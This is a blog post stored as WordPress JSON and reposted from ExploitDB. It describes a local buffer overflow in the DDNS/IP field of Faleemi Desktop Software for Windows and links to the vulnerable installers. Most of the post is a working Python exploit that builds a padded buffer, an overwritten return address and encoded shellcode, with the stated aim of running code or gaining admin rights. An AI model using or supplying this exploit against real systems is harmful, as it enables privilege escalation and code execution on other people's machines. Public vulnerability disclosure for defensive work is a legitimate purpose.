{"id":3129,"date":"2018-03-31T10:41:14","date_gmt":"2018-03-31T10:41:14","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=3129"},"modified":"2018-03-31T10:41:14","modified_gmt":"2018-03-31T10:41:14","slug":"faleemi-windows-desktop-software-ddns-ip-local-buffer-overflow","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=3129","title":{"rendered":"Faleemi Windows Desktop Software &#8211; (DDNS\/IP) Local Buffer Overflow"},"content":{"rendered":"<p><strong>Faleemi Desktop Software for Windows- (DDNS\/IP) Local Buffer Overflow <\/strong><\/p>\n<p><strong>Vuln Description:<\/strong><br \/>\nFaleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. When overly input is given to DDNS\/IP parameter, it overflows the buffer corrupting EIP which can utilized cleverly for local arbitrary code execution. If this software is running as admin and if a low priv user has access to this application to enter new device, he can exploit the Buffer Overflow in the DDNS\/IP parameter to obtain Admin privs. An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.<\/p>\n<p><strong>Vulnerable Application Info:<\/strong><br \/>\n<strong>1. Faleemi Desktop Software for Windows<\/strong><br \/>\nURL: <a href=\"http:\/\/support.faleemi.com\/fsc776\/Faleemi_v1.8.exe\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/support.faleemi.com\/fsc776\/Faleemi_v1.8.exe<\/a><\/p>\n<p>2. Faleemi Desktop Software for Windows (Beta)<br \/>\nURL: <a href=\"http:\/\/support.faleemi.com\/fsc776\/Faleemi_Plus_v1.0.2.exe\">http:\/\/support.faleemi.com\/fsc776\/Faleemi_Plus_v1.0.2.exe<\/a><\/p>\n<p>After hitting enter new device, click Enter device manually<\/p>\n<pre>#!\/usr\/bin\/python \nimport socket\n# Create an array of buffers, from 1 to 5900, with increments of 200. \ncalc = (\"\\x54\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\"\n\"\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\"\n\"\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x59\\x6c\\x6b\\x58\\x6b\\x32\\x53\\x30\"\n\"\\x57\\x70\\x67\\x70\\x53\\x50\\x4e\\x69\\x39\\x75\\x54\\x71\\x39\\x50\\x61\"\n\"\\x74\\x6c\\x4b\\x66\\x30\\x44\\x70\\x6c\\x4b\\x73\\x62\\x46\\x6c\\x6e\\x6b\"\n\"\\x66\\x32\\x66\\x74\\x4e\\x6b\\x62\\x52\\x65\\x78\\x44\\x4f\\x78\\x37\\x72\"\n\"\\x6a\\x46\\x46\\x44\\x71\\x6b\\x4f\\x4c\\x6c\\x57\\x4c\\x53\\x51\\x51\\x6c\"\n\"\\x47\\x72\\x34\\x6c\\x47\\x50\\x69\\x51\\x6a\\x6f\\x64\\x4d\\x37\\x71\\x59\"\n\"\\x57\\x6d\\x32\\x5a\\x52\\x51\\x42\\x61\\x47\\x4e\\x6b\\x36\\x32\\x44\\x50\"\n\"\\x6c\\x4b\\x73\\x7a\\x55\\x6c\\x4c\\x4b\\x42\\x6c\\x52\\x31\\x63\\x48\\x6d\"\n\"\\x33\\x32\\x68\\x43\\x31\\x5a\\x71\\x53\\x61\\x6c\\x4b\\x36\\x39\\x31\\x30\"\n\"\\x73\\x31\\x4e\\x33\\x4c\\x4b\\x50\\x49\\x65\\x48\\x39\\x73\\x46\\x5a\\x37\"\n\"\\x39\\x4e\\x6b\\x64\\x74\\x4e\\x6b\\x63\\x31\\x78\\x56\\x35\\x61\\x6b\\x4f\"\n\"\\x6e\\x4c\\x39\\x51\\x7a\\x6f\\x46\\x6d\\x63\\x31\\x4b\\x77\\x50\\x38\\x6d\"\n\"\\x30\\x32\\x55\\x79\\x66\\x35\\x53\\x71\\x6d\\x78\\x78\\x57\\x4b\\x61\\x6d\"\n\"\\x35\\x74\\x70\\x75\\x69\\x74\\x30\\x58\\x4c\\x4b\\x30\\x58\\x31\\x34\\x75\"\n\"\\x51\\x69\\x43\\x70\\x66\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x6c\\x4b\\x42\\x78\"\n\"\\x75\\x4c\\x76\\x61\\x4e\\x33\\x4e\\x6b\\x57\\x74\\x4e\\x6b\\x55\\x51\\x6a\"\n\"\\x70\\x4d\\x59\\x67\\x34\\x67\\x54\\x77\\x54\\x63\\x6b\\x53\\x6b\\x33\\x51\"\n\"\\x42\\x79\\x73\\x6a\\x33\\x61\\x69\\x6f\\x59\\x70\\x61\\x4f\\x61\\x4f\\x42\"\n\"\\x7a\\x6e\\x6b\\x34\\x52\\x58\\x6b\\x6e\\x6d\\x61\\x4d\\x62\\x4a\\x35\\x51\"\n\"\\x4c\\x4d\\x4f\\x75\\x4f\\x42\\x73\\x30\\x33\\x30\\x63\\x30\\x46\\x30\\x42\"\n\"\\x48\\x45\\x61\\x6e\\x6b\\x52\\x4f\\x4d\\x57\\x6b\\x4f\\x4a\\x75\\x4d\\x6b\"\n\"\\x4c\\x30\\x58\\x35\\x39\\x32\\x51\\x46\\x51\\x78\\x49\\x36\\x4a\\x35\\x6f\"\n\"\\x4d\\x4d\\x4d\\x59\\x6f\\x4a\\x75\\x55\\x6c\\x54\\x46\\x31\\x6c\\x65\\x5a\"\n\"\\x6d\\x50\\x59\\x6b\\x49\\x70\\x31\\x65\\x37\\x75\\x4f\\x4b\\x73\\x77\\x62\"\n\"\\x33\\x62\\x52\\x52\\x4f\\x53\\x5a\\x73\\x30\\x76\\x33\\x79\\x6f\\x68\\x55\"\n\"\\x62\\x43\\x70\\x61\\x42\\x4c\\x35\\x33\\x76\\x4e\\x53\\x55\\x30\\x78\\x43\"\n\"\\x55\\x43\\x30\\x41\\x41\")\n\nbuffer = \"A\" * 132 + \"\\x4B\\x43\\x71\\x6B\" + calc\n\nf = open('shellcode.txt', \"wb\")\nf.write(buffer)\nf.close()\n\n<\/pre>\n<p>Source: <a href=\"https:\/\/www.exploit-db.com\/exploits\/44382\/\" target=\"_blank\" rel=\"noopener noreferrer\">ExploitDB<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Faleemi Desktop Software for Windows- (DDNS\/IP) Local Buffer Overflow Vuln Description: Faleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. When overly input is given to DDNS\/IP parameter, it overflows the buffer corrupting EIP which can utilized cleverly for local arbitrary code execution.<\/p>\n","protected":false},"author":1,"featured_media":3130,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[687,756],"tags":[754,755,757,758],"class_list":["post-3129","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploit","category-exploitdb","tag-buffer-overflow","tag-ddns-ip","tag-faleemi","tag-windows-desktop-software"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3129"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3129\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}